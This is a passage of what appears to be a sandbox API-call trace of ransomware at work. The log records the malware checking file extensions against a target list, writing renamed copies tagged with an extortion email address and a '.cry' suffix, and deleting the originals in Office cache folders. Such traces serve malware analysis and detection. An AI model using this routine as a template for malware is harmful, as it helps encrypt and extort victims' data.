lpNumberOfBytesWritten=0x315fc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0035.663] ReadFile (in: hFile=0x17c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.663] WriteFile (in: hFile=0x180, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.663] SetEndOfFile (hFile=0x180) returned 1 [0035.664] CloseHandle (hObject=0x180) returned 1 [0035.664] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.664] SetEndOfFile (hFile=0x17c) returned 1 [0035.665] CloseHandle (hObject=0x17c) returned 1 [0035.665] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.665] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml")) returned 1 [0035.665] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.665] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.665] lstrlenW (lpString=".doc") returned 4 [0035.665] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.665] lstrlenW (lpString=".docx") returned 5 [0035.665] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0035.665] lstrlenW (lpString=".pdf") returned 4 [0035.665] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.665] lstrlenW (lpString=".xls") returned 4 [0035.666] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.666] lstrlenW (lpString=".xlsx") returned 5 [0035.666] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0035.666] lstrlenW (lpString=".ppt") returned 4 [0035.666] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.666] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.666] lstrlenW (lpString=".zip") returned 4 [0035.666] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.666] lstrlenW (lpString=".rar") returned 4 [0035.666] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.666] lstrlenW (lpString=".bz2") returned 4 [0035.666] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.666] lstrlenW (lpString=".7z") returned 3 [0035.666] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.666] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.666] lstrlenW (lpString=".dbf") returned 4 [0035.666] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.666] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.666] lstrlenW (lpString=".1cd") returned 4 [0035.666] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.666] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.666] lstrlenW (lpString=".jpg") returned 4 [0035.666] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.666] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.666] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.666] lstrlenW (lpString=".doc") returned 4 [0035.666] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.666] lstrlenW (lpString=".docx") returned 5 [0035.666] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0035.666] lstrlenW (lpString=".pdf") returned 4 [0035.666] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.666] lstrlenW (lpString=".xls") returned 4 [0035.666] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.666] lstrlenW (lpString=".xlsx") returned 5 [0035.666] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0035.666] lstrlenW (lpString=".ppt") returned 4 [0035.666] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.666] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.666] lstrlenW (lpString=".zip") returned 4 [0035.667] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.667] lstrlenW (lpString=".rar") returned 4 [0035.667] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.667] lstrlenW (lpString=".bz2") returned 4 [0035.667] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.667] lstrlenW (lpString=".7z") returned 3 [0035.667] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.667] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.667] lstrlenW (lpString=".dbf") returned 4 [0035.667] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.667] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.667] lstrlenW (lpString=".1cd") returned 4 [0035.667] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.667] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 81 [0035.667] lstrlenW (lpString=".jpg") returned 4 [0035.667] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.667] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.667] lstrlenW (lpString="Proofing.xml") returned 12 [0035.667] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.668] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=811) returned 1 [0035.668] CloseHandle (hObject=0x17c) returned 1 [0035.668] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml")) returned 0x2020 [0035.668] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.668] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.668] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.668] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.668] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0035.668] GetLastError () returned 0x0 [0035.668] ReadFile (in: hFile=0x17c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x32b, lpOverlapped=0x0) returned 1 [0035.799] WriteFile (in: hFile=0x180, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x330, lpOverlapped=0x0) returned 1 [0035.800] ReadFile (in: hFile=0x17c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.800] WriteFile (in: hFile=0x180, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0035.800] SetEndOfFile (hFile=0x180) returned 1 [0035.800] CloseHandle (hObject=0x180) returned 1 [0035.801] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.801] SetEndOfFile (hFile=0x17c) returned 1 [0035.801] CloseHandle (hObject=0x17c) returned 1 [0035.801] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.802] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml")) returned 1 [0035.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.802] lstrlenW (lpString=".doc") returned 4 [0035.802] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.802] lstrlenW (lpString=".docx") returned 5 [0035.802] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0035.802] lstrlenW (lpString=".pdf") returned 4 [0035.802] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.802] lstrlenW (lpString=".xls") returned 4 [0035.802] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.802] lstrlenW (lpString=".xlsx") returned 5 [0035.802] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0035.802] lstrlenW (lpString=".ppt") returned 4 [0035.802] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.802] lstrlenW (lpString=".zip") returned 4 [0035.802] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.802] lstrlenW (lpString=".rar") returned 4 [0035.802] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.802] lstrlenW (lpString=".bz2") returned 4 [0035.802] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.802] lstrlenW (lpString=".7z") returned 3 [0035.802] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.802] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.802] lstrlenW (lpString=".dbf") returned 4 [0035.803] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.803] lstrlenW (lpString=".1cd") returned 4 [0035.803] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.803] lstrlenW (lpString=".jpg") returned 4 [0035.803] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.803] lstrlenW (lpString=".doc") returned 4 [0035.803] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.803] lstrlenW (lpString=".docx") returned 5 [0035.803] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0035.803] lstrlenW (lpString=".pdf") returned 4 [0035.803] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.803] lstrlenW (lpString=".xls") returned 4 [0035.803] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.803] lstrlenW (lpString=".xlsx") returned 5 [0035.803] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0035.803] lstrlenW (lpString=".ppt") returned 4 [0035.803] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.803] lstrlenW (lpString=".zip") returned 4 [0035.803] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.803] lstrlenW (lpString=".rar") returned 4 [0035.803] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.803] lstrlenW (lpString=".bz2") returned 4 [0035.803] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.803] lstrlenW (lpString=".7z") returned 3 [0035.803] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.803] lstrlenW (lpString=".dbf") returned 4 [0035.803] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.803] lstrlenW (lpString=".1cd") returned 4 [0035.803] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.803] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 75 [0035.803] lstrlenW (lpString=".jpg") returned 4 [0035.803] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.804] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.804] lstrlenW (lpString="InfoPathMUI.xml") returned 15 [0035.804] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.804] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=1231) returned 1 [0035.804] CloseHandle (hObject=0x17c) returned 1 [0035.805] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml")) returned 0x2020 [0035.805] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.805] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.805] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.805] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.805] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0035.805] GetLastError () returned 0x0 [0035.805] ReadFile (in: hFile=0x17c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x4cf, lpOverlapped=0x0) returned 1 [0035.882] WriteFile (in: hFile=0x180, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x4d0, lpOverlapped=0x0) returned 1 [0035.883] ReadFile (in: hFile=0x17c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.883] WriteFile (in: hFile=0x180, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xf2, lpOverlapped=0x0) returned 1 [0035.883] SetEndOfFile (hFile=0x180) returned 1 [0035.885] CloseHandle (hObject=0x180) returned 1 [0035.886] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.886] SetEndOfFile (hFile=0x17c) returned 1 [0035.887] CloseHandle (hObject=0x17c) returned 1 [0035.887] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.887] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml")) returned 1 [0035.887] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.888] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.888] lstrlenW (lpString=".doc") returned 4 [0035.888] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.888] lstrlenW (lpString=".docx") returned 5 [0035.888] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.888] lstrlenW (lpString=".pdf") returned 4 [0035.888] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.888] lstrlenW (lpString=".xls") returned 4 [0035.888] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.888] lstrlenW (lpString=".xlsx") returned 5 [0035.888] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.888] lstrlenW (lpString=".ppt") returned 4 [0035.888] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.888] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.888] lstrlenW (lpString=".zip") returned 4 [0035.888] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.888] lstrlenW (lpString=".rar") returned 4 [0035.888] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.888] lstrlenW (lpString=".bz2") returned 4 [0035.888] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.888] lstrlenW (lpString=".7z") returned 3 [0035.888] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.888] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.888] lstrlenW (lpString=".dbf") returned 4 [0035.888] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.889] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.889] lstrlenW (lpString=".1cd") returned 4 [0035.889] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.889] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.889] lstrlenW (lpString=".jpg") returned 4 [0035.889] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.889] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.889] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.889] lstrlenW (lpString=".doc") returned 4 [0035.889] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.889] lstrlenW (lpString=".docx") returned 5 [0035.889] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.889] lstrlenW (lpString=".pdf") returned 4 [0035.889] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.889] lstrlenW (lpString=".xls") returned 4 [0035.889] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.889] lstrlenW (lpString=".xlsx") returned 5 [0035.889] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.889] lstrlenW (lpString=".ppt") returned 4 [0035.889] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.889] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.889] lstrlenW (lpString=".zip") returned 4 [0035.889] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.889] lstrlenW (lpString=".rar") returned 4 [0035.889] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.889] lstrlenW (lpString=".bz2") returned 4 [0035.889] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.889] lstrlenW (lpString=".7z") returned 3 [0035.889] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.889] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.889] lstrlenW (lpString=".dbf") returned 4 [0035.889] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.889] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.889] lstrlenW (lpString=".1cd") returned 4 [0035.889] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.889] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml") returned 78 [0035.890] lstrlenW (lpString=".jpg") returned 4 [0035.890] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.890] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.890] lstrlenW (lpString="OneNoteMUI.xml") returned 14 [0035.890] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.891] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=1606) returned 1 [0035.891] CloseHandle (hObject=0x17c) returned 1 [0035.891] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml")) returned 0x2020 [0035.891] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.891] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0035.891] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.891] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.891] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0035.892] GetLastError () returned 